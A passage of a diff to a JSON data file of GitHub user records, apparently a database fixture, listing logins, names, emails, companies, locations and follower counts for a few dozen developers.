"MDQ6VXNlcjE2MTYwNTUx", + "public_repositories_count": 9, + "created_at": "2017-05-18T16:06:09Z", + "updated_at": "2024-07-10T16:26:52Z", + "node_id": "MDQ6VXNlcjI4Nzg3MDIy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -409328,24 +667552,49 @@ }, { "model": "github.user", - "pk": 1964, + "pk": 7266, "fields": { - "nest_created_at": "2024-09-12T00:31:40.064Z", - "nest_updated_at": "2024-09-12T00:31:40.064Z", - "name": "", - "login": "dcolak8figures", + "nest_created_at": "2024-09-22T08:43:22.422Z", + "nest_updated_at": "2024-09-22T19:28:06.114Z", + "name": "Oliver Weyhmueller", + "login": "weyhmueller", + "email": "oliver@weyhmueller.de", + "avatar_url": "https://avatars.githubusercontent.com/u/948167?v=4", + "company": "@bwi-de", + "location": "Germany", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 7, + "public_gists_count": 3, + "public_repositories_count": 49, + "created_at": "2011-07-30T06:41:49Z", + "updated_at": "2024-09-14T16:48:53Z", + "node_id": "MDQ6VXNlcjk0ODE2Nw==", + "bio": "", + "is_hireable": false, + "twitter_username": "weyhmueller" + } +}, +{ + "model": "github.user", + "pk": 7267, + "fields": { + "nest_created_at": "2024-09-22T08:43:22.735Z", + "nest_updated_at": "2024-09-22T19:28:06.435Z", + "name": "Richard Mealing", + "login": "mealingr", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/123566838?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6968527?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 1, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-01-25T14:24:26Z", - "updated_at": "2024-08-30T11:54:10Z", - "node_id": "U_kgDOB1169g", + "public_repositories_count": 13, + "created_at": "2014-03-16T19:30:47Z", + "updated_at": "2024-08-19T15:49:16Z", + "node_id": "MDQ6VXNlcjY5Njg1Mjc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -409353,74 +667602,99 @@ }, { "model": "github.user", - "pk": 1965, + "pk": 7268, "fields": { - "nest_created_at": "2024-09-12T00:31:41.251Z", - "nest_updated_at": "2024-09-12T00:31:41.251Z", + "nest_created_at": "2024-09-22T08:43:23.056Z", + "nest_updated_at": "2024-09-22T19:28:06.753Z", "name": "", - "login": "baderdah", + "login": "sellersj", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/46382227?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4390?v=4", "company": "", - "location": "paris", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 9, "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2019-01-04T17:45:34Z", - "updated_at": "2024-07-26T13:21:52Z", - "node_id": "MDQ6VXNlcjQ2MzgyMjI3", - "bio": "Full stack engineer", + "public_repositories_count": 42, + "created_at": "2008-04-02T23:45:01Z", + "updated_at": "2024-09-19T11:25:31Z", + "node_id": "MDQ6VXNlcjQzOTA=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1966, + "pk": 7269, "fields": { - "nest_created_at": "2024-09-12T00:31:42.460Z", - "nest_updated_at": "2024-09-12T00:33:52.624Z", - "name": "Prabhakaran Rajendran", - "login": "prabutdr", + "nest_created_at": "2024-09-22T08:43:23.369Z", + "nest_updated_at": "2024-09-22T19:28:07.061Z", + "name": "Michele Bologna", + "login": "mbologna", + "email": "github@michelebologna.net", + "avatar_url": "https://avatars.githubusercontent.com/u/530992?v=4", + "company": "@SUSE ", + "location": "", + "collaborators_count": 0, + "following_count": 37, + "followers_count": 45, + "public_gists_count": 2, + "public_repositories_count": 25, + "created_at": "2010-12-20T19:50:22Z", + "updated_at": "2024-09-14T11:26:10Z", + "node_id": "MDQ6VXNlcjUzMDk5Mg==", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 7270, + "fields": { + "nest_created_at": "2024-09-22T08:43:23.688Z", + "nest_updated_at": "2024-09-22T19:28:07.377Z", + "name": "Harjit Sandhu", + "login": "harj-the-dev", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/19872503?v=4", - "company": "", - "location": "Chennai, India", + "avatar_url": "https://avatars.githubusercontent.com/u/24942063?v=4", + "company": "Zoopla", + "location": "London", "collaborators_count": 0, - "following_count": 11, + "following_count": 0, "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 24, - "created_at": "2016-06-11T11:40:25Z", - "updated_at": "2024-09-02T12:15:48Z", - "node_id": "MDQ6VXNlcjE5ODcyNTAz", - "bio": "", + "public_repositories_count": 6, + "created_at": "2017-01-05T17:25:10Z", + "updated_at": "2024-07-22T11:15:59Z", + "node_id": "MDQ6VXNlcjI0OTQyMDYz", + "bio": "Principal Application Security Engineer for @Zoopla", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1967, + "pk": 7271, "fields": { - "nest_created_at": "2024-09-12T00:31:45.667Z", - "nest_updated_at": "2024-09-12T00:31:45.667Z", - "name": "adam", - "login": "adam-siklosi", + "nest_created_at": "2024-09-22T08:43:23.997Z", + "nest_updated_at": "2024-09-22T19:28:07.697Z", + "name": "Felix Ingram", + "login": "lllama", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/60606607?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/598411?v=4", + "company": "NCC Group", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2020-02-03T11:34:51Z", - "updated_at": "2024-01-02T06:42:38Z", - "node_id": "MDQ6VXNlcjYwNjA2NjA3", + "following_count": 23, + "followers_count": 138, + "public_gists_count": 10, + "public_repositories_count": 79, + "created_at": "2011-02-03T10:34:58Z", + "updated_at": "2024-09-22T11:25:29Z", + "node_id": "MDQ6VXNlcjU5ODQxMQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -409428,49 +667702,49 @@ }, { "model": "github.user", - "pk": 1968, + "pk": 7272, "fields": { - "nest_created_at": "2024-09-12T00:31:47.258Z", - "nest_updated_at": "2024-09-12T00:31:47.258Z", - "name": "Scott McGowan", - "login": "scottmcgowan24", + "nest_created_at": "2024-09-22T08:43:24.324Z", + "nest_updated_at": "2024-09-22T19:28:08.029Z", + "name": "Dan Halperin", + "login": "dhalperi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/68561250?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/526415?v=4", + "company": "@aws", + "location": "Seattle", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2020-07-20T17:57:46Z", - "updated_at": "2024-04-19T16:41:36Z", - "node_id": "MDQ6VXNlcjY4NTYxMjUw", - "bio": "", + "followers_count": 280, + "public_gists_count": 11, + "public_repositories_count": 75, + "created_at": "2010-12-16T21:40:17Z", + "updated_at": "2024-09-20T21:37:07Z", + "node_id": "MDQ6VXNlcjUyNjQxNQ==", + "bio": "Batfish @ AWS\r\nFormer head of engineering @ Intentionet", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1969, + "pk": 7273, "fields": { - "nest_created_at": "2024-09-12T00:31:48.913Z", - "nest_updated_at": "2024-09-12T00:31:48.913Z", - "name": "Sebastian", - "login": "sbszcz", - "email": "sebastian.barszczewski@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/2794784?v=4", - "company": "", - "location": "Berlin", + "nest_created_at": "2024-09-22T08:43:24.645Z", + "nest_updated_at": "2024-09-22T19:28:08.340Z", + "name": "Tobias Gruetzmacher", + "login": "TobiX", + "email": "tobias-git@23.gs", + "avatar_url": "https://avatars.githubusercontent.com/u/78534?v=4", + "company": "@Inform-Software ", + "location": "Germany", "collaborators_count": 0, - "following_count": 7, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2012-11-14T09:56:40Z", - "updated_at": "2024-09-02T07:34:37Z", - "node_id": "MDQ6VXNlcjI3OTQ3ODQ=", + "following_count": 22, + "followers_count": 50, + "public_gists_count": 25, + "public_repositories_count": 46, + "created_at": "2009-04-27T22:29:31Z", + "updated_at": "2024-08-25T09:40:12Z", + "node_id": "MDQ6VXNlcjc4NTM0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -409478,99 +667752,124 @@ }, { "model": "github.user", - "pk": 1970, + "pk": 7274, "fields": { - "nest_created_at": "2024-09-12T00:31:52.164Z", - "nest_updated_at": "2024-09-12T00:31:52.164Z", - "name": "Priyanka Kadam", - "login": "kadampriyanka1109", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/31645495?v=4", + "nest_created_at": "2024-09-22T08:43:24.962Z", + "nest_updated_at": "2024-09-22T19:28:08.690Z", + "name": "Alex", + "login": "sashashura", + "email": "aleksandrosansan@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/93376818?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 8, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2017-09-05T06:24:49Z", - "updated_at": "2023-09-29T06:23:54Z", - "node_id": "MDQ6VXNlcjMxNjQ1NDk1", - "bio": "Android Developer", + "public_repositories_count": 536, + "created_at": "2021-10-29T09:18:53Z", + "updated_at": "2024-09-04T07:12:48Z", + "node_id": "U_kgDOBZDRMg", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1971, + "pk": 7275, "fields": { - "nest_created_at": "2024-09-12T00:31:54.232Z", - "nest_updated_at": "2024-09-12T00:31:54.232Z", - "name": "Gustavo Martinez", - "login": "gmartinezmirai", + "nest_created_at": "2024-09-22T08:43:25.277Z", + "nest_updated_at": "2024-09-22T19:41:25.248Z", + "name": "Mark Prins", + "login": "mprins", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9316125?v=4", - "company": "Mirai Solutions", - "location": "Zurich, Switzerland", + "avatar_url": "https://avatars.githubusercontent.com/u/1165786?v=4", + "company": "@B3Partners ", + "location": "Earth (mostly)", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2014-10-20T08:07:03Z", - "updated_at": "2024-08-20T07:46:44Z", - "node_id": "MDQ6VXNlcjkzMTYxMjU=", + "following_count": 15, + "followers_count": 37, + "public_gists_count": 5, + "public_repositories_count": 47, + "created_at": "2011-11-01T20:21:13Z", + "updated_at": "2024-09-13T07:26:55Z", + "node_id": "MDQ6VXNlcjExNjU3ODY=", "bio": "", "is_hireable": false, + "twitter_username": "mc_prins" + } +}, +{ + "model": "github.user", + "pk": 7276, + "fields": { + "nest_created_at": "2024-09-22T08:43:25.611Z", + "nest_updated_at": "2024-09-22T19:28:09.313Z", + "name": "Stephan Fuhrmann", + "login": "sfuhrm", + "email": "s@sfuhrm.de", + "avatar_url": "https://avatars.githubusercontent.com/u/5055427?v=4", + "company": "", + "location": "Karlsruhe, Germany", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 19, + "public_gists_count": 2, + "public_repositories_count": 65, + "created_at": "2013-07-20T20:41:59Z", + "updated_at": "2024-09-21T11:26:00Z", + "node_id": "MDQ6VXNlcjUwNTU0Mjc=", + "bio": "Passionate about networking automation, CI/CD advocate, developer and code evangelist. ", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1972, + "pk": 7277, "fields": { - "nest_created_at": "2024-09-12T00:31:55.460Z", - "nest_updated_at": "2024-09-16T22:30:24.317Z", - "name": "Martin Müller", - "login": "mum-viadee", + "nest_created_at": "2024-09-22T08:43:26.254Z", + "nest_updated_at": "2024-09-22T19:28:09.941Z", + "name": "P. Ottlinger", + "login": "ottlinger", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/39087682?v=4", - "company": "@viadee", - "location": "Münster, Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/1323134?v=4", + "company": "", + "location": "Berlin, Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 5, + "followers_count": 13, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2018-05-08T11:24:11Z", - "updated_at": "2024-08-30T12:31:16Z", - "node_id": "MDQ6VXNlcjM5MDg3Njgy", - "bio": "", + "public_repositories_count": 36, + "created_at": "2012-01-11T22:27:49Z", + "updated_at": "2024-09-21T22:14:04Z", + "node_id": "MDQ6VXNlcjEzMjMxMzQ=", + "bio": "Agile Open Source Geek -\r\nASF member -\r\nProud father -\r\nLiving in the countryside, working in Berlin", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1973, + "pk": 7278, "fields": { - "nest_created_at": "2024-09-12T00:31:56.670Z", - "nest_updated_at": "2024-09-12T00:31:56.670Z", - "name": "Joe DiPol", - "login": "barchetta", - "email": "joe.dipol@oracle.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6116667?v=4", - "company": "Oracle", - "location": "Santa Clara, CA", + "nest_created_at": "2024-09-22T08:43:26.915Z", + "nest_updated_at": "2024-09-22T19:28:10.561Z", + "name": "", + "login": "Aeyaa", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/87331921?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 16, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 20, - "created_at": "2013-12-05T18:31:38Z", - "updated_at": "2024-08-13T18:43:20Z", - "node_id": "MDQ6VXNlcjYxMTY2Njc=", + "public_repositories_count": 1, + "created_at": "2021-07-12T17:24:03Z", + "updated_at": "2024-08-29T19:21:38Z", + "node_id": "MDQ6VXNlcjg3MzMxOTIx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -409578,74 +667877,74 @@ }, { "model": "github.user", - "pk": 1974, + "pk": 7279, "fields": { - "nest_created_at": "2024-09-12T00:32:02.801Z", - "nest_updated_at": "2024-09-12T00:32:02.801Z", - "name": "Tina Junold", - "login": "tina-junold", + "nest_created_at": "2024-09-22T08:43:27.228Z", + "nest_updated_at": "2024-09-22T19:28:10.867Z", + "name": "Wei Kang", + "login": "weikangchia", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/300583?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2174882?v=4", "company": "", - "location": "Germany", + "location": "Singapore", "collaborators_count": 0, - "following_count": 1, - "followers_count": 5, - "public_gists_count": 4, - "public_repositories_count": 39, - "created_at": "2010-06-09T06:30:17Z", - "updated_at": "2024-09-05T14:06:02Z", - "node_id": "MDQ6VXNlcjMwMDU4Mw==", - "bio": "", - "is_hireable": false, + "following_count": 12, + "followers_count": 19, + "public_gists_count": 77, + "public_repositories_count": 46, + "created_at": "2012-08-18T13:24:17Z", + "updated_at": "2024-09-10T10:52:30Z", + "node_id": "MDQ6VXNlcjIxNzQ4ODI=", + "bio": "Once a Programmer, Always a Programmer", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1975, + "pk": 7280, "fields": { - "nest_created_at": "2024-09-12T00:32:04.009Z", - "nest_updated_at": "2024-09-12T00:32:04.010Z", - "name": "Jan", - "login": "ExplodingSalad", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/57450839?v=4", + "nest_created_at": "2024-09-22T08:43:27.538Z", + "nest_updated_at": "2024-09-22T19:28:11.193Z", + "name": "Jesse", + "login": "livingwithcode", + "email": "livingwithcode@outlook.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2201678?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 3, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2019-11-06T15:28:22Z", - "updated_at": "2024-08-07T12:05:46Z", - "node_id": "MDQ6VXNlcjU3NDUwODM5", - "bio": "", + "public_repositories_count": 1, + "created_at": "2012-08-23T05:41:52Z", + "updated_at": "2023-02-02T03:22:31Z", + "node_id": "MDQ6VXNlcjIyMDE2Nzg=", + "bio": "Living with code", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1976, + "pk": 7281, "fields": { - "nest_created_at": "2024-09-12T00:32:05.222Z", - "nest_updated_at": "2024-09-12T00:32:05.222Z", - "name": "", - "login": "Ryusko13", + "nest_created_at": "2024-09-22T08:43:27.874Z", + "nest_updated_at": "2024-09-22T19:28:11.505Z", + "name": "Albert Wang", + "login": "albertwangnz", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/146357315?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/110079777?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 1, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-09-28T14:12:09Z", - "updated_at": "2023-10-11T20:47:37Z", - "node_id": "U_kgDOCLk8Qw", + "public_repositories_count": 2, + "created_at": "2022-07-27T04:07:12Z", + "updated_at": "2024-08-31T21:50:50Z", + "node_id": "U_kgDOBo-vIQ", "bio": "", "is_hireable": false, "twitter_username": "" @@ -409653,24 +667952,24 @@ }, { "model": "github.user", - "pk": 1977, + "pk": 7282, "fields": { - "nest_created_at": "2024-09-12T00:32:06.447Z", - "nest_updated_at": "2024-09-12T00:32:06.447Z", - "name": "", - "login": "SergeS", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1794852?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:43:28.526Z", + "nest_updated_at": "2024-09-22T19:28:12.146Z", + "name": "Mark Rekveld", + "login": "markrekveld", + "email": "markrekveld@marvelution.com", + "avatar_url": "https://avatars.githubusercontent.com/u/193849?v=4", + "company": "@Marvelution ", + "location": "Netherlands", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2012-05-30T18:44:49Z", - "updated_at": "2024-09-10T08:32:21Z", - "node_id": "MDQ6VXNlcjE3OTQ4NTI=", + "following_count": 1, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 1, + "created_at": "2010-02-01T14:10:38Z", + "updated_at": "2024-08-20T20:36:06Z", + "node_id": "MDQ6VXNlcjE5Mzg0OQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -409678,24 +667977,24 @@ }, { "model": "github.user", - "pk": 1978, + "pk": 7283, "fields": { - "nest_created_at": "2024-09-12T00:32:08.499Z", - "nest_updated_at": "2024-09-12T00:32:08.499Z", - "name": "Christopher", - "login": "Dekari", + "nest_created_at": "2024-09-22T08:43:29.170Z", + "nest_updated_at": "2024-09-22T19:28:12.770Z", + "name": "Samael", + "login": "SingingBush", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6056948?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/870567?v=4", + "company": "@itv", + "location": "UK", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2013-11-28T08:03:26Z", - "updated_at": "2024-03-08T10:01:24Z", - "node_id": "MDQ6VXNlcjYwNTY5NDg=", + "following_count": 19, + "followers_count": 16, + "public_gists_count": 18, + "public_repositories_count": 78, + "created_at": "2011-06-23T12:57:52Z", + "updated_at": "2024-09-03T13:25:14Z", + "node_id": "MDQ6VXNlcjg3MDU2Nw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -409703,24 +668002,24 @@ }, { "model": "github.user", - "pk": 1979, + "pk": 7284, "fields": { - "nest_created_at": "2024-09-12T00:32:09.728Z", - "nest_updated_at": "2024-09-12T00:32:34.926Z", - "name": "", - "login": "creasoft-dag", + "nest_created_at": "2024-09-22T08:43:29.792Z", + "nest_updated_at": "2024-09-22T19:28:13.396Z", + "name": "Erik Hooijmeijer", + "login": "ctrl-alt-dev", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/121297210?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/961253?v=4", + "company": "42 B.V.", + "location": "Netherlands", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 13, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-12-23T12:47:36Z", - "updated_at": "2024-05-21T14:56:32Z", - "node_id": "U_kgDOBzrZOg", + "public_repositories_count": 6, + "created_at": "2011-08-05T13:26:58Z", + "updated_at": "2024-06-12T05:16:19Z", + "node_id": "MDQ6VXNlcjk2MTI1Mw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -409728,99 +668027,99 @@ }, { "model": "github.user", - "pk": 1980, + "pk": 7285, "fields": { - "nest_created_at": "2024-09-12T00:32:10.968Z", - "nest_updated_at": "2024-09-12T00:32:10.968Z", - "name": "", - "login": "mikkocc", + "nest_created_at": "2024-09-22T08:43:30.118Z", + "nest_updated_at": "2024-09-22T19:28:13.721Z", + "name": "Rolf Ahrenberg", + "login": "rofafor", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/147476964?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/9297850?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 15, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-10-10T06:01:28Z", - "updated_at": "2023-10-10T06:01:28Z", - "node_id": "U_kgDOCMpR5A", + "public_repositories_count": 30, + "created_at": "2014-10-18T18:10:05Z", + "updated_at": "2024-08-07T12:29:15Z", + "node_id": "MDQ6VXNlcjkyOTc4NTA=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1981, + "pk": 7286, "fields": { - "nest_created_at": "2024-09-12T00:32:12.583Z", - "nest_updated_at": "2024-09-12T00:32:12.583Z", - "name": "", - "login": "SMUnlimited", + "nest_created_at": "2024-09-22T08:43:30.484Z", + "nest_updated_at": "2024-09-22T19:28:14.051Z", + "name": "Vincent Jansen", + "login": "vdotjansen", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5180431?v=4", - "company": "", - "location": "England", + "avatar_url": "https://avatars.githubusercontent.com/u/3529996?v=4", + "company": "Blueriq", + "location": "Netherlands", "collaborators_count": 0, - "following_count": 0, - "followers_count": 8, + "following_count": 8, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2013-08-07T08:04:41Z", - "updated_at": "2024-06-08T18:24:04Z", - "node_id": "MDQ6VXNlcjUxODA0MzE=", - "bio": "Principal Engineer", + "public_repositories_count": 21, + "created_at": "2013-02-11T07:12:37Z", + "updated_at": "2024-01-15T13:10:58Z", + "node_id": "MDQ6VXNlcjM1Mjk5OTY=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1982, + "pk": 7287, "fields": { - "nest_created_at": "2024-09-12T00:32:14.269Z", - "nest_updated_at": "2024-09-12T00:32:14.269Z", - "name": "Kim youngjoon", - "login": "Kim-Young-Joon", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/83807464?v=4", + "nest_created_at": "2024-09-22T08:43:30.800Z", + "nest_updated_at": "2024-09-22T19:28:14.421Z", + "name": "", + "login": "timdodd", + "email": "timbododd@hotmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3916171?v=4", "company": "", - "location": "", + "location": "Regina, Saskatchewan", "collaborators_count": 0, - "following_count": 12, - "followers_count": 6, + "following_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 18, - "created_at": "2021-05-07T07:05:40Z", - "updated_at": "2024-02-27T07:35:01Z", - "node_id": "MDQ6VXNlcjgzODA3NDY0", + "public_repositories_count": 12, + "created_at": "2013-03-20T02:23:44Z", + "updated_at": "2024-03-06T04:54:37Z", + "node_id": "MDQ6VXNlcjM5MTYxNzE=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "timbododd" } }, { "model": "github.user", - "pk": 1983, + "pk": 7288, "fields": { - "nest_created_at": "2024-09-12T00:32:15.455Z", - "nest_updated_at": "2024-09-12T00:32:15.455Z", - "name": "Giorgi Adeishvili", - "login": "georgemff", + "nest_created_at": "2024-09-22T08:43:31.798Z", + "nest_updated_at": "2024-09-22T19:28:15.353Z", + "name": "Simon Lieschke", + "login": "slieschke", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/37007370?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/742941?v=4", "company": "", - "location": "", + "location": "Ottawa, Ontario", "collaborators_count": 0, - "following_count": 0, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 25, - "created_at": "2018-03-03T02:28:20Z", - "updated_at": "2024-07-25T10:27:55Z", - "node_id": "MDQ6VXNlcjM3MDA3Mzcw", + "following_count": 15, + "followers_count": 15, + "public_gists_count": 1, + "public_repositories_count": 12, + "created_at": "2011-04-21T03:27:28Z", + "updated_at": "2024-06-25T02:15:05Z", + "node_id": "MDQ6VXNlcjc0Mjk0MQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -409828,24 +668127,24 @@ }, { "model": "github.user", - "pk": 1984, + "pk": 7289, "fields": { - "nest_created_at": "2024-09-12T00:32:17.919Z", - "nest_updated_at": "2024-09-12T00:32:17.919Z", - "name": "Jakub Jablonski", - "login": "JakubJablonski2-TomTom", - "email": "jakub.jablonski2@tomtom.com", - "avatar_url": "https://avatars.githubusercontent.com/u/511938?v=4", - "company": "@tomtom-international", - "location": "PL", + "nest_created_at": "2024-09-22T08:43:32.430Z", + "nest_updated_at": "2024-09-22T19:28:15.981Z", + "name": "Philipp Moisel", + "login": "pmoisel", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/204455?v=4", + "company": "nterra integration GmbH", + "location": "", "collaborators_count": 0, "following_count": 9, "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2010-12-06T18:25:05Z", - "updated_at": "2024-08-12T06:23:32Z", - "node_id": "MDQ6VXNlcjUxMTkzOA==", + "public_repositories_count": 6, + "created_at": "2010-02-16T08:36:36Z", + "updated_at": "2024-09-17T08:43:28Z", + "node_id": "MDQ6VXNlcjIwNDQ1NQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -409853,49 +668152,49 @@ }, { "model": "github.user", - "pk": 1985, + "pk": 7290, "fields": { - "nest_created_at": "2024-09-12T00:32:19.957Z", - "nest_updated_at": "2024-09-12T00:32:19.957Z", - "name": "ExNG", - "login": "ExNG", + "nest_created_at": "2024-09-22T08:43:32.746Z", + "nest_updated_at": "2024-09-22T19:28:16.293Z", + "name": "Paul Williamson", + "login": "squarefrog", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/24767736?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/343450?v=4", "company": "", - "location": "Berlin, Germany", + "location": "Cambridgeshire, UK", "collaborators_count": 0, - "following_count": 1, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 27, - "created_at": "2016-12-25T21:33:33Z", - "updated_at": "2024-09-11T15:58:45Z", - "node_id": "MDQ6VXNlcjI0NzY3NzM2", - "bio": "", + "following_count": 5, + "followers_count": 52, + "public_gists_count": 21, + "public_repositories_count": 78, + "created_at": "2010-07-25T12:08:07Z", + "updated_at": "2024-09-08T23:02:57Z", + "node_id": "MDQ6VXNlcjM0MzQ1MA==", + "bio": "Ex-Holga fanatic, nerd, programmer, metalhead", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1986, + "pk": 7291, "fields": { - "nest_created_at": "2024-09-12T00:32:21.213Z", - "nest_updated_at": "2024-09-12T00:32:21.213Z", - "name": "Joachim Beckers", - "login": "jbeckers", + "nest_created_at": "2024-09-22T08:43:33.380Z", + "nest_updated_at": "2024-09-22T19:28:16.952Z", + "name": "", + "login": "chalmets", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/379626?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/11472764?v=4", "company": "", - "location": "Leuven, Belgium", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 3, - "public_gists_count": 1, - "public_repositories_count": 24, - "created_at": "2010-08-29T09:56:27Z", - "updated_at": "2024-08-27T07:30:07Z", - "node_id": "MDQ6VXNlcjM3OTYyNg==", + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2015-03-14T10:05:40Z", + "updated_at": "2024-08-23T17:41:01Z", + "node_id": "MDQ6VXNlcjExNDcyNzY0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -409903,24 +668202,24 @@ }, { "model": "github.user", - "pk": 1987, + "pk": 7292, "fields": { - "nest_created_at": "2024-09-12T00:32:22.446Z", - "nest_updated_at": "2024-09-12T00:32:22.446Z", + "nest_created_at": "2024-09-22T08:43:34.014Z", + "nest_updated_at": "2024-09-22T19:28:17.569Z", "name": "", - "login": "reynaldiwong", + "login": "dbevacqua", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/72689828?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6534306?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-10-11T10:01:49Z", - "updated_at": "2023-11-28T05:04:35Z", - "node_id": "MDQ6VXNlcjcyNjg5ODI4", + "following_count": 1, + "followers_count": 3, + "public_gists_count": 15, + "public_repositories_count": 4, + "created_at": "2014-01-29T11:57:14Z", + "updated_at": "2024-08-27T13:48:59Z", + "node_id": "MDQ6VXNlcjY1MzQzMDY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -409928,14 +668227,14 @@ }, { "model": "github.user", - "pk": 1988, + "pk": 7293, 